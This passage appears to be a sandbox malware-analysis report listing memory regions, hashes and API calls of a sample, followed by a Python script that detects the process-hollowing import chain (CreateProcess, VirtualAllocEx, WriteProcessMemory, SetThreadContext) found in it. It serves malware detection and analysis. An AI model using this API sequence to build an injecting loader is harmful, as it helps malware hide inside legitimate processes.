            Has elevated privileges:true
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

              Execution Graph

              Execution Coverage:11.1%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:190
              Total number of Limit Nodes:10

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Pp]q
              • API String ID: 0-2528107101
              • Opcode ID: bc4183ffd2d8b743a983ae6ff15f2c1e2c5c2249e225c1debef162435aec295d
              • Instruction ID: 60ee975face023aa79be0859f7c3f84bf10857e4ee861919ef2dcdbfaa118653
              • Opcode Fuzzy Hash: bc4183ffd2d8b743a983ae6ff15f2c1e2c5c2249e225c1debef162435aec295d
              • Instruction Fuzzy Hash: D8D2E734A01218CFCB15DF68D994AD9B7B2FF8A300F1591E9E409AB365DB31AE85CF50

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Pp]q
              • API String ID: 0-2528107101
              • Opcode ID: fc87636dcfde1103115406600e165c3fba94335925afa0728462b7b13dda2947
              • Instruction ID: c0153c1ae249b706dd5dc12a1399cdad09e67de3331300a6d231b6d2b6d5b628
              • Opcode Fuzzy Hash: fc87636dcfde1103115406600e165c3fba94335925afa0728462b7b13dda2947
              • Instruction Fuzzy Hash: 1CB2E834A00618CFCB15DF28D994AD9B7B2FF8A300F1585E9D809AB365DB31AE85CF50
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39f64008bad0c1bb918723759fd88eec2cae8d0334831db31cc5fe532e2d52b0
              • Instruction ID: bab5aadf418db08508de775bebf62e2dc08c4d25f9e781aaa67b47af045cf347
              • Opcode Fuzzy Hash: 39f64008bad0c1bb918723759fd88eec2cae8d0334831db31cc5fe532e2d52b0
              • Instruction Fuzzy Hash: E691C723918AD287C7124F3988371DAFBB0AF0617CF1D828DD9E85F192D216F8A2C745
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aba15c8e4bb19a500c27bc0d0574390e0f0feb15cfb03849dea14aa2cba7ad61
              • Instruction ID: f190d1190193943b125e10b58af159d272b01a940b2b1c2f957e38e7d3d20ffd
              • Opcode Fuzzy Hash: aba15c8e4bb19a500c27bc0d0574390e0f0feb15cfb03849dea14aa2cba7ad61
              • Instruction Fuzzy Hash: A5A00265C8F04888A3C07C1445001B8C43C8B4F048F42F000502B330439D11C009439D

              Control-flow Graph
              • Entry 6adabed, basic blocks 6adabed-6adaf3d (the executed/not-executed rendering is not reproduced here)
              • CreateProcessA is called from block 6adad87-6adae41
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ADAE2E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 64a98cde5c90c29ea84dc26fa3847ddb0cf35951e5e9372681f76c053934fdc9
              • Instruction ID: 9f3461c59473701b1d066674c761d992f68c98a02b870a3952d4c23931f7531c
              • Opcode Fuzzy Hash: 64a98cde5c90c29ea84dc26fa3847ddb0cf35951e5e9372681f76c053934fdc9
              • Instruction Fuzzy Hash: 43A17B71D00219CFDB64DF68C841BEDBBB2FF48314F1485AAE94AA7280DB749985CF91

              Control-flow Graph
              • Entry 6adabf8, basic blocks 6adabf8-6adaf3d (the executed/not-executed rendering is not reproduced here); same body as the 6adabed function above, entered past its first block
              • CreateProcessA is called from block 6adad87-6adae41
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ADAE2E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 12f65db127200cee0fc04bcb0939e0e3d0e65f6899ab70cbf4dd0e84f8f8efc9
              • Instruction ID: b18e1281b0da659436e5e9cb76734727390acb4e7af4ce7b74ba9c7c0ad66203
              • Opcode Fuzzy Hash: 12f65db127200cee0fc04bcb0939e0e3d0e65f6899ab70cbf4dd0e84f8f8efc9
              • Instruction Fuzzy Hash: B7917C71D00219CFDB64DF68C841BEDBBB2FF48314F1485AAE919A7280DB749985CF91

              Control-flow Graph
              • Entry 87adc8, basic blocks 87adc8-87b048 (the executed/not-executed rendering is not reproduced here)
              • Internal calls to 87a0ec, 87a0f8, 87a108, 87a118, 87a128, 87b051 and 87b060
              • GetModuleHandleW is called from block 87b000-87b02b
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0087B01E
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: 6a716c9acbd5932883f259c84b22221fe54cd61d3c741831e49995c672027c1f
              • Instruction ID: d2b25813d4fdf6e167f33a37cc84bda76df58d1f09a7a152b3e9675a40afb708
              • Opcode Fuzzy Hash: 6a716c9acbd5932883f259c84b22221fe54cd61d3c741831e49995c672027c1f
              • Instruction Fuzzy Hash: 79815770A00B058FD728DF69D09479ABBF5FF88304F00892DE49AD7A54DB75E849CB92

              Control-flow Graph
              • Entry 87590d, basic blocks 87590d-875a61 (the executed/not-executed rendering is not reproduced here)
              • CreateActCtxA is called from the entry block 87590d-8759d9
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 008759C9
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: a8c29b603f3beef4df8216a7b7b3cc8abc2c0663a8174e7e49afe622e1af4540
              • Instruction ID: 816ec8da97daf66ae208cad98016a0db15119e3ec3e6ce988086748f62029aed
              • Opcode Fuzzy Hash: a8c29b603f3beef4df8216a7b7b3cc8abc2c0663a8174e7e49afe622e1af4540
              • Instruction Fuzzy Hash: A041E0B1C00619CFDB24CFA9C884BDEBBB5FF49304F20816AD418AB255DBB55946CF91

              Control-flow Graph
              • Entry 8744c4, basic blocks 8744c4-875a61 (the executed/not-executed rendering is not reproduced here); shares its tail with the 87590d function above
              • CreateActCtxA is called from the entry block 8744c4-8759d9
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 008759C9
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 3f82724b6d63e5b3cdeecda75b711c94646de846e9723288f8c1388fb10e5eff
              • Instruction ID: 75f40368094af70a4788e69dbf924fb3234d6beb98a06258edcff1193993a53c
              • Opcode Fuzzy Hash: 3f82724b6d63e5b3cdeecda75b711c94646de846e9723288f8c1388fb10e5eff
              • Instruction Fuzzy Hash: 1341E2B1C0061DCBDB24CFA9C884B9DBBB5FF48304F20816AD518AB255DBB55946CF91
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 02674101
              Memory Dump Source
              • Source File: 00000000.00000002.2030753809.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2670000_SecuriteInfo.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID:
              • API String ID: 2714655100-0
              • Opcode ID: e66771b10055062b99bd5975911c03562e0b0fecd9aba9838a80b45658ceef1a
              • Instruction ID: 65a376333c83e16197cad614247d2823a2977409780d2bb23257ea993bea2b74
              • Opcode Fuzzy Hash: e66771b10055062b99bd5975911c03562e0b0fecd9aba9838a80b45658ceef1a
              • Instruction Fuzzy Hash: 36413AB4A00349CFCB14DF99D488AAABBF5FF88314F24C599D519AB321D774A841CFA0
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ADAA00
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 8d0b19ebde3a728da61668e3b58c14936bdca62f3502720755600e16b0002ddb
              • Instruction ID: 3bccd857e5ca0a8d2e29c6c5fb4b645cedb9153ad108c4e19b5703c37a59c646
              • Opcode Fuzzy Hash: 8d0b19ebde3a728da61668e3b58c14936bdca62f3502720755600e16b0002ddb
              • Instruction Fuzzy Hash: F92146B1D003499FCB10DFA9C881BEEBBF5FF48310F10842AEA59A7250C7789944CBA1
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ADAA00
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: beacae65f3b49b823cf88f0798fe5d590766087da6d1a70dc504e0a3504d9391
              • Instruction ID: 661247d57667152c8c28a9990323d88761ffe6b3cfdfb778ede736bde3f86662
              • Opcode Fuzzy Hash: beacae65f3b49b823cf88f0798fe5d590766087da6d1a70dc504e0a3504d9391
              • Instruction Fuzzy Hash: 1E2148B1D003599FCB10DFAAC985BEEBBF5FF48310F10842AE919A7250C7789944CBA1
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADA856
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 8a6e929c5c09fcea883aee74680229eaff43da11d39ea6b2f42ad65978f9a382
              • Instruction ID: ad7729192fff2581b6cc8dd96731afe0d28dc6f31872362b2219855be169c0a7
              • Opcode Fuzzy Hash: 8a6e929c5c09fcea883aee74680229eaff43da11d39ea6b2f42ad65978f9a382
              • Instruction Fuzzy Hash: 88215971D003498FDB10DFAEC4857EEBBF4EF49310F548429D919A7240CB789945CBA1
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0087D676,?,?,?,?,?), ref: 0087D737
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: f4818311523a6d8df6bef8cbf08f411a9b5805ba54fd2a209edbdb36fe7c1658
              • Instruction ID: 45af921a271d8c1ae058e8ca12a8b1be18fed51eec5a2d05c339ff05b921bd88
              • Opcode Fuzzy Hash: f4818311523a6d8df6bef8cbf08f411a9b5805ba54fd2a209edbdb36fe7c1658
              • Instruction Fuzzy Hash: C421E3B5900358AFDB10CF9AD584AEEBBF8FF48310F14801AE918A7310D378A944CFA5
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0087D676,?,?,?,?,?), ref: 0087D737
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 3a4f4e2399d79b75320ca62d6a05e277f503b4d5840048b4b2ea3a2e4ea2c4e8
              • Instruction ID: 6366b53683e615140e1fcccae7119c95a46a58f1bcf990613f8b8583ad1b7766
              • Opcode Fuzzy Hash: 3a4f4e2399d79b75320ca62d6a05e277f503b4d5840048b4b2ea3a2e4ea2c4e8
              • Instruction Fuzzy Hash: 3F2105B59002589FDB10CFAAD584AEEBFF5FF48310F14801AE918A3310C378A945CFA0
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ADAAE0
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: a50de2cf7584ae5ba1276c9d1b13e369fffc74de6a0121456a33febb5cd4d3d4
              • Instruction ID: 3e2440abd287ce511f91682aaf5e69719da59b4bfd1398938787c024f7aca80e
              • Opcode Fuzzy Hash: a50de2cf7584ae5ba1276c9d1b13e369fffc74de6a0121456a33febb5cd4d3d4
              • Instruction Fuzzy Hash: 732148B1C002499FCB10DFAAC885BEEFBF5FF48310F108429E519A7250CB78A940CBA1
              APIs
              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADA856
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: 1aba7fe90e92cb884178a0482e5251e9d6ab2764899d6c9ec050a7478baae4a5
              • Instruction ID: b3f4f97ab8a2c5adfd6f22e53db210a61ea3fd52d00fee80e62e34b15cc315e1
              • Opcode Fuzzy Hash: 1aba7fe90e92cb884178a0482e5251e9d6ab2764899d6c9ec050a7478baae4a5
              • Instruction Fuzzy Hash: 1D2127B1D003498FDB10DFAAC4857EEBBF4EF88314F54842AD919A7240CB78A945CFA1
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ADAAE0
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 083eb40458f089a2dc051b69a6c5953dfa592608c3d3bd638065f37ee8ec6279
              • Instruction ID: 3b3ddd530b6ce61367eda8003ebe6ae10f1b69a9cec775cfa49fb27329a7a75a
              • Opcode Fuzzy Hash: 083eb40458f089a2dc051b69a6c5953dfa592608c3d3bd638065f37ee8ec6279
              • Instruction Fuzzy Hash: 8A2137B1C003599FCB10DFAAC981AEEFBF5FF48310F50842AE519A7250CB789944CBA1
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ADA91E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: be4ae279f42eb454c0b8544a21c4da28c31d5f4ba9331b499f1b3cbce0dac53b
              • Instruction ID: ed2dc9e0ab681c951b82fa627b78573dd6d6467e52be633e096b9e8d439286d8
              • Opcode Fuzzy Hash: be4ae279f42eb454c0b8544a21c4da28c31d5f4ba9331b499f1b3cbce0dac53b
              • Instruction Fuzzy Hash: 3F1147758002499FCB20DFAAC845BEEBFF5EF88314F108419E519A7250CB399540CBA1
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0087B099,00000800,00000000,00000000), ref: 0087B2AA
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: 82a7d692b862929ff871b3c9036789dd6169a812e53c39d5d7e8ef4c38782e99
              • Instruction ID: 53c566fcc10512aa9c259223e6f7fcaf31ac0f55c6c02571ff321fd9b68cdab1
              • Opcode Fuzzy Hash: 82a7d692b862929ff871b3c9036789dd6169a812e53c39d5d7e8ef4c38782e99
              • Instruction Fuzzy Hash: 881126B68003099FDB10CF9AC444BDEFBF5FB88310F10842AD519A7210C379A945CFA5
              APIs
              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0087B099,00000800,00000000,00000000), ref: 0087B2AA
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: LibraryLoad
              • String ID:
              • API String ID: 1029625771-0
              • Opcode ID: ecc81f59c261249a96f68075dae87366c93a6aedde0e7a057ade70679a6bb2ce
              • Instruction ID: 680332e8220f8ae5d35a01af444f7076468c4d5a68ac987e5269d2f6e7bda4d2
              • Opcode Fuzzy Hash: ecc81f59c261249a96f68075dae87366c93a6aedde0e7a057ade70679a6bb2ce
              • Instruction Fuzzy Hash: 371126B68002498FDB10DF9AC484BDEFBF5FF88310F14842AD919A7211C379A945CFA5
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ADA91E
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 8c3831ea7a260684d8dbf0cf20ba8db693d562be520b2021ea108a6411fae4aa
              • Instruction ID: 7aed09830420c733666860130382d480213ff728f32279494244545056eea25b
              • Opcode Fuzzy Hash: 8c3831ea7a260684d8dbf0cf20ba8db693d562be520b2021ea108a6411fae4aa
              • Instruction Fuzzy Hash: F81137758002499FCB10DFAAC845BEEBFF5FF88314F108419E519A7250CB79A940CFA1
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: f62cd7bea773a49356df01827c31918476b00d0cff9fd6583fbc167a64a12f7c
              • Instruction ID: 3288b7353324980982f920cadf2d369754568bcff05c88411f32b10d8e84f987
              • Opcode Fuzzy Hash: f62cd7bea773a49356df01827c31918476b00d0cff9fd6583fbc167a64a12f7c
              • Instruction Fuzzy Hash: AB1158B5D003089FCB20EFAAC4457EEFBF5EF88310F208429D519A7240CB39A944CBA4
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 894f93fe089ff5bafd8389a12aae8c7f4d293f07ea48e31b85dab935e1fd72e9
              • Instruction ID: 86346b5422cdd8d9aa6245d69e3d9b89f4fa59a7d42d496b0169378fd651215b
              • Opcode Fuzzy Hash: 894f93fe089ff5bafd8389a12aae8c7f4d293f07ea48e31b85dab935e1fd72e9
              • Instruction Fuzzy Hash: 54113AB1D002488FDB20DFAAC4457EEFBF5EF88314F208419D519A7240CB79A544CBA5
              APIs
              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ADE145
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 43f34b91d69a450e9a83dfb93d2fb10de826eb78826112bc81fbe36ecef89fbd
              • Instruction ID: a29aaa7d920b02dde603f790cbf852a06df8b66b2e35e918ad90a755f66fae0d
              • Opcode Fuzzy Hash: 43f34b91d69a450e9a83dfb93d2fb10de826eb78826112bc81fbe36ecef89fbd
              • Instruction Fuzzy Hash: E91110B68002499FCB11DF9AC885BDEBBF8FB48324F108459E528A7250C378A940CFA1
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0087B01E
              Memory Dump Source
              • Source File: 00000000.00000002.2029681268.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_870000_SecuriteInfo.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: a9d551ed71f8c8e6413da7735de08264632dbd8cda7b6acd0ceaf4480001e3a1
              • Instruction ID: a06294d8847c8d095b35356ff1e41cadb9fdc9eee0e581c0d977692ef0b11675
              • Opcode Fuzzy Hash: a9d551ed71f8c8e6413da7735de08264632dbd8cda7b6acd0ceaf4480001e3a1
              • Instruction Fuzzy Hash: BC11DFB5C006498FDB20DF9AD444BDEFBF5FB88314F10842AD529A7214D379A545CFA1
              APIs
              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ADE145
              Memory Dump Source
              • Source File: 00000000.00000002.2032911329.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_SecuriteInfo.jbxd
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              • Opcode ID: 8a128ea5798f5d06a1a91b61faa0ad2c52993767e66fbc2a1f142798341ded66
              • Instruction ID: f2fd6623a27f89dd1a284e2b391c99602b775116c61878818da2de695e176023
              • Opcode Fuzzy Hash: 8a128ea5798f5d06a1a91b61faa0ad2c52993767e66fbc2a1f142798341ded66
              • Instruction Fuzzy Hash: 0411F2B58003499FDB60DF9AC885BDEBBF8FB48310F10841AE519A7200C379A944CFA5
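              The API entries lifted from the 06AD0000 region (CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, plus ResumeThread as an API ID) are the import set of a RunPE-style process-hollowing loader, which is what the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode" signatures in the overview key on. The Python below is an added example and not part of the Joe Sandbox report or its plugin: it parses API lines in the report's own layout, groups them by the "Offset:" of the memory dump they came from, and flags any region whose resolved imports cover the hollowing chain. The embedded sample is constructed from the entries above with the Source File names shortened; the grouping, the required/supporting split and the function names are my own choices. Two caveats: the parser keys on the call line, so the two ResumeThread entries, which carry only an API ID, are not counted; and the ref addresses are call sites inside what is most likely JIT-compiled P/Invoke stubs (the region is "based on PE: false"), so their order says nothing about the runtime sequence. The 00000010 in PostMessageW's second argument is WM_CLOSE.

```python
"""Flag the process-hollowing import set in a Joe Sandbox "APIs" listing."""
import re
from dataclasses import dataclass

# Constructed sample: the API entries from the listing above, kept in the
# report's own layout (an "APIs" header, the call line, then the dump source
# whose "Offset:" names the memory region).  Source File names are shortened.
SAMPLE_REPORT = """\
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ADAE2E
Memory Dump Source
• Source File: ...0000000006AD0000...sdmp, Offset: 06AD0000, based on PE: false
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ADAA00
Memory Dump Source
• Source File: ...0000000006AD0000...sdmp, Offset: 06AD0000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADA856
Memory Dump Source
• Source File: ...0000000006AD0000...sdmp, Offset: 06AD0000, based on PE: false
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ADAAE0
Memory Dump Source
• Source File: ...0000000006AD0000...sdmp, Offset: 06AD0000, based on PE: false
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ADA91E
Memory Dump Source
• Source File: ...0000000006AD0000...sdmp, Offset: 06AD0000, based on PE: false
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06ADE145
Memory Dump Source
• Source File: ...0000000006AD0000...sdmp, Offset: 06AD0000, based on PE: false
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0087B099,00000800,00000000,00000000), ref: 0087B2AA
Memory Dump Source
• Source File: ...0000000000870000...sdmp, Offset: 00870000, based on PE: false
"""

API_LINE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
OFFSET_LINE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

# Imports that together make up the classic RunPE / process-hollowing loader
# (my grouping).  Names are compared after normalize(), so A/W and Wow64
# variants all match the same entry.
HOLLOWING_REQUIRED = {"CreateProcess", "VirtualAllocEx", "WriteProcessMemory", "SetThreadContext"}
HOLLOWING_SUPPORT = {"ReadProcessMemory", "GetThreadContext", "ResumeThread", "NtUnmapViewOfSection"}
WM_CLOSE = 0x10  # the message id seen as PostMessageW's second argument above


@dataclass(frozen=True)
class ApiCall:
    region: str    # "Offset:" of the memory dump the function was lifted from
    api: str       # normalised import name
    module: str    # module Joe Sandbox resolved the import to
    args: tuple    # raw argument tokens; "?" means the value was not recovered
    ref: str       # address of the call site


def normalize(api: str) -> str:
    """CreateProcessA -> CreateProcess, Wow64SetThreadContext -> SetThreadContext."""
    api = api.removeprefix("Wow64")
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


def parse_api_calls(text: str) -> list[ApiCall]:
    """Attach each API line to the region named by the next "Offset:" line."""
    calls, pending = [], []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            pending.append(m.groups())
            continue
        m = OFFSET_LINE.search(line)
        if m:
            region = m.group(1).upper()
            calls += [ApiCall(region, normalize(a), mod, tuple(args.split(",")), ref.upper())
                      for a, mod, args, ref in pending]
            pending = []
    return calls


def find_hollowing_chains(calls: list[ApiCall]) -> dict:
    """Per region: which hollowing imports are present, and a verdict."""
    seen = {}
    for c in calls:
        seen.setdefault(c.region, set()).add(c.api)
    return {
        region: {
            "required": sorted(apis & HOLLOWING_REQUIRED),
            "support": sorted(apis & HOLLOWING_SUPPORT),
            "verdict": HOLLOWING_REQUIRED <= apis,
        }
        for region, apis in seen.items()
    }


def wm_close_posts(calls: list[ApiCall]) -> list[str]:
    """Call sites that post WM_CLOSE (message 0x10) via PostMessage."""
    return [c.ref for c in calls
            if c.api == "PostMessage" and len(c.args) > 1 and c.args[1] != "?"
            and int(c.args[1], 16) == WM_CLOSE]


if __name__ == "__main__":
    calls = parse_api_calls(SAMPLE_REPORT)
    for region, info in find_hollowing_chains(calls).items():
        print(region, "hollowing chain" if info["verdict"] else "no chain", info)
    print("WM_CLOSE posted at", wm_close_posts(calls))
```

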